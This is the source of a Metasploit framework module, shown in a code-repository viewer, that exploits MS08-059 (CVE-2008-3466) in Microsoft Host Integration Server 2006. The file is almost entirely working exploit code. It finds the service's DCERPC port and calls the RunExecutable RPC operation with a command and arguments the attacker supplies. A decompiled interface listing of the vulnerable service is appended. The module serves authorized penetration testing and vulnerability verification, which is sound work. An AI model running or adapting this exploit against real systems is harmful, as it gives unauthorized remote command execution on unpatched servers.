root / modules / auxiliary / admin / ms / ms08_059_his2006.rb @ master
History | View | Annotate | Download (4 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Auxiliary |
| 15 |
|
| 16 |
include Msf::Exploit::Remote::DCERPC |
| 17 |
|
| 18 |
def initialize(info = {}) |
| 19 |
super(update_info(info,
|
| 20 |
'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability', |
| 21 |
'Description' => %q{ |
| 22 |
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006. |
| 23 |
},
|
| 24 |
'DefaultOptions' =>
|
| 25 |
{
|
| 26 |
'DCERPC::ReadTimeout' => 300 # Long-running RPC calls |
| 27 |
}, |
| 28 |
'Author' => [ 'MC' ], |
| 29 |
'License' => MSF_LICENSE, |
| 30 |
'Version' => '$Revision$', |
| 31 |
'References' =>
|
| 32 |
[ |
| 33 |
[ 'MSB', 'MS08-059' ], |
| 34 |
[ 'CVE', '2008-3466' ], |
| 35 |
[ 'OSVDB', '49068' ], |
| 36 |
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ], |
| 37 |
], |
| 38 |
'DisclosureDate' => 'Oct 14 2008')) |
| 39 |
|
| 40 |
register_options( |
| 41 |
[ |
| 42 |
Opt::RPORT(0), |
| 43 |
OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']), |
| 44 |
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt']) |
| 45 |
], self.class )
|
| 46 |
end
|
| 47 |
|
| 48 |
def run |
| 49 |
|
| 50 |
dport = datastore['RPORT'].to_i
|
| 51 |
|
| 52 |
if (dport != 0) |
| 53 |
print_status("Could not use automatic target when the remote port is given");
|
| 54 |
return
|
| 55 |
end
|
| 56 |
|
| 57 |
if (dport == 0) |
| 58 |
|
| 59 |
dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp') |
| 60 |
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp') |
| 61 |
|
| 62 |
if (not dport) |
| 63 |
print_status("Could not determine the RPC port used by the Service.")
|
| 64 |
return
|
| 65 |
end
|
| 66 |
|
| 67 |
print_status("Discovered Host Integration Server RPC service on port #{dport}")
|
| 68 |
end
|
| 69 |
|
| 70 |
connect(true, { 'RPORT' => dport }) |
| 71 |
|
| 72 |
dcerpc_handle('ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) |
| 73 |
print_status("Binding to #{handle} ...")
|
| 74 |
|
| 75 |
dcerpc_bind(handle) |
| 76 |
print_status("Bound to #{handle} ...")
|
| 77 |
|
| 78 |
cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}") |
| 79 |
|
| 80 |
print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")
|
| 81 |
|
| 82 |
begin
|
| 83 |
dcerpc_call(0x01, cmd)
|
| 84 |
rescue Rex::Proto::DCERPC::Exceptions::NoResponse |
| 85 |
end
|
| 86 |
|
| 87 |
disconnect |
| 88 |
|
| 89 |
end
|
| 90 |
end
|
| 91 |
|
| 92 |
=begin
|
| 93 |
/* |
| 94 |
* IDL code generated by mIDA v1.0.8 |
| 95 |
* Copyright (C) 2006, Tenable Network Security |
| 96 |
* http://cgi.tenablesecurity.com/tenable/mida.php |
| 97 |
* |
| 98 |
* |
| 99 |
* Decompilation information: |
| 100 |
* RPC stub type: inline |
| 101 |
*/ |
| 102 |
|
| 103 |
[ |
| 104 |
uuid(ed6ee250-e0d1-11cf-925a-00aa00c006c1), |
| 105 |
version(1.1) |
| 106 |
] |
| 107 |
|
| 108 |
interface mIDA_interface |
| 109 |
{
|
| 110 |
|
| 111 |
unknown _SnaRpcService_PingServer ( |
| 112 |
); |
| 113 |
|
| 114 |
|
| 115 |
/* opcode: 0x01, address: 0x01002CBB */ |
| 116 |
|
| 117 |
small _SnaRpcService_RunExecutable ( |
| 118 |
[in][string] char arg_1, |
| 119 |
[in][string] char arg_2 |
| 120 |
); |
| 121 |
|
| 122 |
/* opcode: 0x02, address: 0x01002F0B */ |
| 123 |
|
| 124 |
long _SnaRpcService_CallRemoteDll ( |
| 125 |
[in] long arg_1, |
| 126 |
[in][size_is(arg_1)] byte arg_2[], |
| 127 |
[in] long arg_3, |
| 128 |
[in][size_is(arg_1)] byte arg_4[] |
| 129 |
); |
| 130 |
|
| 131 |
unknown _SnaRpcService_GetInstalledDrives ( |
| 132 |
); |
| 133 |
|
| 134 |
unknown _SnaRpcService_ServiceTableUpdate ( |
| 135 |
); |
| 136 |
|
| 137 |
|
| 138 |
/* opcode: 0x05, address: 0x0100363C */ |
| 139 |
|
| 140 |
long _SnaRpcService_GetWindowsVersion ( |
| 141 |
[in] long arg_1, |
| 142 |
[in, out][size_is(arg_1)] byte arg_2[] |
| 143 |
); |
| 144 |
|
| 145 |
|
| 146 |
/* opcode: 0x06, address: 0x01003942 */ |
| 147 |
|
| 148 |
small _SnaRpcService_RunExecutableEx ( |
| 149 |
[in][string] char arg_1, |
| 150 |
[in][string] char arg_2, |
| 151 |
[in][string] char arg_3 |
| 152 |
); |
| 153 |
|
| 154 |
|
| 155 |
/* opcode: 0x07, address: 0x01003BAB */ |
| 156 |
|
| 157 |
long _SnaRpcService_GetDLCMediaType ( |
| 158 |
[in][string] char arg_1, |
| 159 |
[out][ref] long * arg_2 |
| 160 |
); |
| 161 |
|
| 162 |
|
| 163 |
/* opcode: 0x08, address: 0x01003E29 */ |
| 164 |
|
| 165 |
small _SnaRpcService_UserHasAccess ( |
| 166 |
[in] long arg_1 |
| 167 |
); |
| 168 |
|
| 169 |
|
| 170 |
/* opcode: 0x09, address: 0x01004061 */ |
| 171 |
|
| 172 |
small _SnaRpcService_ConfigureHisService ( |
| 173 |
[in][string] char arg_1 |
| 174 |
); |
| 175 |
|
| 176 |
|
| 177 |
/* opcode: 0x0A, address: 0x01004272 */ |
| 178 |
|
| 179 |
small _SnaRpcService_ConfigureServiceAccount ( |
| 180 |
[in][string] char arg_1 |
| 181 |
); |
| 182 |
|
| 183 |
} |
| 184 |
=end |